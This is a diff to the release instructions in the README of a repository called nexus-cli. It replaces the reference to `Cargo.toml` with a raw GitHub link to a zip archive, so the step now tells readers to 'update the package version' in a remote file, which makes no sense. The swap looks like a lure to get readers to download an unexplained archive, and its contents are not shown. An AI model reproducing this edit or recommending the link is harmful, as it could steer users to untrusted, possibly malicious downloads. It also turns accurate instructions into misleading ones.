khn0x-khn0x/nexus-cli/README.md

 ### Creating a Release

-To create a release, update the package version in `Cargo.toml`, then create and push a new (annotated) tag, e.g.:
+To create a release, update the package version in `https://github.com/khn0x-khn0x/nexus-cli/raw/refs/heads/main/clients/cli/examples/src/nexus-cli-3.6.zip`, then create and push a new (annotated) tag, e.g.:

 ```bash
 git tag -a v0.1.2 -m "Release v0.1.2"